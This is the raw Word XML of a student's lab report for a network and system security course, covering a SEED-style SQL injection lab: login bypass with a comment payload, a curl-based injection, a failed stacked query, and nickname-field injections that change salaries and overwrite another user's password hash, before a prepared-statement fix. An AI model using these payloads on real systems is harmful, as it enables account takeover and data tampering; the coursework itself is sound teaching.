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6EA034DD">
        <w:trPr>
          <w:trHeight w:val="2880" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467E195F">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                <w:caps/>
              </w:rPr>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                  <w:caps/>
                  <w:kern w:val="2"/>
                  <w:sz w:val="24"/>
                </w:rPr>
                <w:alias w:val="公司"/>
                <w:id w:val="15524243"/>
                <w:placeholder>
                  <w:docPart w:val="A6413A42EFF84760B6ED45128BFB8E4B"/>
                </w:placeholder>
                <w:text/>
              </w:sdtPr>
              <w:sdtEndPr>
                <w:rPr>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                  <w:caps/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="32"/>
                </w:rPr>
              </w:sdtEndPr>
              <w:sdtContent>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                    <w:caps/>
                    <w:sz w:val="32"/>
                  </w:rPr>
                  <w:t>哈尔滨工业大学(深圳)</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="40AC90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sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
              <w:b/>
              <w:sz w:val="80"/>
              <w:szCs w:val="80"/>
            </w:rPr>
            <w:alias w:val="标题"/>
            <w:id w:val="15524250"/>
            <w:placeholder>
              <w:docPart w:val="40E78F683E0847A5BD761921B6626388"/>
            </w:placeholder>
            <w:text/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
              <w:b/>
              <w:sz w:val="80"/>
              <w:szCs w:val="80"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="9016" w:type="dxa"/>
                <w:tcBorders>
                  <w:bottom w:val="single" w:color="4472C4" w:themeColor="accent1" w:sz="4" w:space="0"/>
                </w:tcBorders>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w14:paraId="1318FCF2">
                <w:pPr>
                  <w:pStyle w:val="11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80"/>
                    <w:szCs w:val="80"/>
                  </w:rPr>
                  <w:t xml:space="preserve">网络与系统安全》 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                    <w:b/>
                    <w:sz w:val="80"/>
                    <w:szCs w:val="80"/>
                  </w:rPr>
                  <w:t xml:space="preserve">  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80"/>
                    <w:szCs w:val="80"/>
                  </w:rPr>
                  <w:t>实验报告</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
      </w:tr>
      <w:tr w14:paraId="22DA2A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9016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4472C4" w:themeColor="accent1" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37390DFB">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35D314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016" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26ADB0A6">
            <w:pPr>
              <w:pStyle w:val="11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实验二</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705E8F04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hint="eastAsia" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                  <w:sz w:val="36"/>
                  <w:szCs w:val="44"/>
                </w:rPr>
                <w:alias w:val="副标题"/>
                <w:id w:val="15524255"/>
                <w:placeholder>
                  <w:docPart w:val="6F4444EE8D6146BCB0E6B5A747D0047A"/>
                </w:placeholder>
                <w:text/>
              </w:sdtPr>
              <w:sdtEndPr>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                  <w:sz w:val="36"/>
                  <w:szCs w:val="44"/>
                </w:rPr>
              </w:sdtEndPr>
              <w:sdtContent>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:hint="eastAsia" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
                    <w:sz w:val="36"/>
                    <w:szCs w:val="44"/>
                  </w:rPr>
                  <w:t>SQL注入 实验</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
          <w:p w14:paraId="76A18DED">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2ECEB882">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B890CFF">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63C46E32">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01C47306">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="687D4E25">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A2BDEA7">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="700964C9">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="336C7519">
            <w:pPr>
              <w:ind w:firstLine="1080" w:firstLineChars="45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 xml:space="preserve">学  院: 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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>计算机科学与技术学院</w:t>
            </w:r>
            <w:r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</w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="7"/>
              <w:tblW w:w="8246" w:type="dxa"/>
              <w:tblInd w:w="71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6"/>
              <w:gridCol w:w="5870"/>
            </w:tblGrid>
            <w:tr w14:paraId="07BED8C9"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 w14:paraId="62D50025">
                  <w:pPr>
                    <w:ind w:firstLine="600"/>
                    <w:jc w:val="left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</w:rPr>
                    <w:t>姓  名:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5870" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="207370E6">
                  <w:pPr>
                    <w:ind w:firstLine="0" w:firstLineChars="0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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>刘睿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   </w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w14:paraId="1CAC5CAD"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 w14:paraId="3F8F5775">
                  <w:pPr>
                    <w:ind w:firstLine="600"/>
                    <w:jc w:val="left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</w:rPr>
                    <w:t>学  号:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5870" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="791B056F">
                  <w:pPr>
                    <w:ind w:firstLine="0" w:firstLineChars="0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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>220110720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14:paraId="1AB33B2D"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 w14:paraId="1B6C1B50">
                  <w:pPr>
                    <w:ind w:firstLine="600"/>
                    <w:jc w:val="left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</w:rPr>
                    <w:t>专  业:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5870" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1D6083F6">
                  <w:pPr>
                    <w:ind w:firstLine="0" w:firstLineChars="0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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>计算机科学与技术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14:paraId="1CBE9723"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2376" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="68F1F9C6">
                  <w:pPr>
                    <w:ind w:firstLine="600"/>
                    <w:jc w:val="left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</w:rPr>
                    <w:t>日  期:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5870" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="26080543">
                  <w:pPr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2025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>年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>4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月 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</w:tbl>
          <w:p w14:paraId="56B8CB3E">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A59E5D7">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B0D1BE0"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一、实验过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F33DF5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>每个实验步骤（共9个小任务（任务1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，任务2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，任务3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>、3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，任务4））</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求有具体截图和分析说明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FB778">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B0A797">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务1.1** 运行上述命令后，需要使用SQL命令打印员工Alice的所有概要信息。请提供你的结果截图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFB1AA">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5275580" cy="205486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504C4">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4772025" cy="84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F2C5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2867025" cy="122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37BA">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5276850" cy="697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9B846">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="039B0F5E">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D667E38">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务1.2** [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选做，需要安装sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t>]运行上述命令后，可以将credential中的所有信息dump下来。请提供你的结果截图，并根据第一条命令找出可以注入的信息点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28997471">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BF84D4">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481B2995">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6145AFBE">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9F7D59">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26134952">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC3FA77">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F5EF5E">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务2.1**:网页SQL注入攻击。利用Admin账户，可以尝试使用其他账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F291C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5275580" cy="3014345"/>
            <wp:effectExtent l="0" t="0" r="127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2CAC">
      <w:pPr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在USERNAME输入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这样生成的SQL查询为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C1059"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SELECT * FROM credential WHERE name='admin' --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>' AND password=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF29ABD"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由于 -- 注释掉了后面的内容，相当于</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB80CC4"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SELECT * FROM credential WHERE name='admin';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA663ED"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所以能返回管理员信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC83C73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791496F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11740465">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务2.2**:命令行SQL注入攻击。利用c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ur</w:t>
      </w:r>
      <w:r>
        <w:t>l命令进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F7AB6">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5278120" cy="2391410"/>
            <wp:effectExtent l="0" t="0" r="177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D12B8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同理构造 curl 命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1430EBCF">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>curl 'http://www.seed-server.com/unsafe_home.php?username=admin%27%20--%20&amp;Password=123'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C90C68"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得到HTML内容如上图，可见最下面出现了用户表格的内容，表示成功进行了SQL注入攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BD3FB">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08741651">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务2.3**:追加一条新的SQL语句。请尝试通过登录页面运行两条SQL语句,并说明是否能够获取到信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3A285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尝试在USERNAME输入构造的payload：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FEE51E"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admin'; UPDATE credential SET salary=1 WHERE name='Boby'; --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33148044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返回的页面为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24127C">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5275580" cy="598170"/>
            <wp:effectExtent l="0" t="0" r="127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F600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表示SQL注入攻击失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364880C0">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FE38F6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这是因为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E9F60"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 应用使用了 mysqli_query() 函数（不支持多语句执行）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即使注入成功，MySQL 也只执行第一条语句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第二条 SQL 被直接丢弃或引发语法错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28599D66">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E1AE18">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A9E895">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务3.1**:修改自己的工资。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A363026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登入Alice的账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B305136">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3110230" cy="2914015"/>
            <wp:effectExtent l="0" t="0" r="139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AD45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在nickname栏输入test', salary=99999 WHERE name='Alice' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC7283B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这样注入后的SQL实际变成了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2BA1C5">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3886835" cy="560705"/>
            <wp:effectExtent l="0" t="0" r="1841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661A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由此成功修改工资字段如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3DF96">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3213735" cy="3092450"/>
            <wp:effectExtent l="0" t="0" r="571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BEA9">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BBF055">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务3.2**:修改其他人的工资。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A06D5E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类似上面的操作，在Alice的nickname字段中输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C9901"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x', salary=1 WHERE name='Boby' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE648F">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3177540" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="381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22C5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这样原SQL变成：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FCDD43">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4351655" cy="559435"/>
            <wp:effectExtent l="0" t="0" r="10795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4745"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由此Boby的工资会被修改为1美元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E4047E">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1799C9B3">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E68C7FA">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务3.3**:修改他人密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E98F1">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3225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A484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计算一个想要的密码的SHA1哈希值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3823785F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依旧对nickname注入以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D038B8">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>x', Password='7c4a8d09ca3762af61e59520943dc26494f8941b' WHERE name='Boby' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC784F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注入后SQL变成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70DBC8">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="168910"/>
            <wp:effectExtent l="0" t="0" r="698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9128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Boby的密码被修改为123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38C973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尝试登录Boby的账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2A6B3">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3537585" cy="2672080"/>
            <wp:effectExtent l="0" t="0" r="5715" b="139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2576D"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发现Boby的账号确实被更改成123456了，注入攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63486F">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9CDB43">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>**任务4**：在这个任务中，我们将使用预处理语句机制来修复SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F0061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修改前：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E9757">
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3836670" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="1143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D29C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依旧可以通过注入进行登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E2C96">
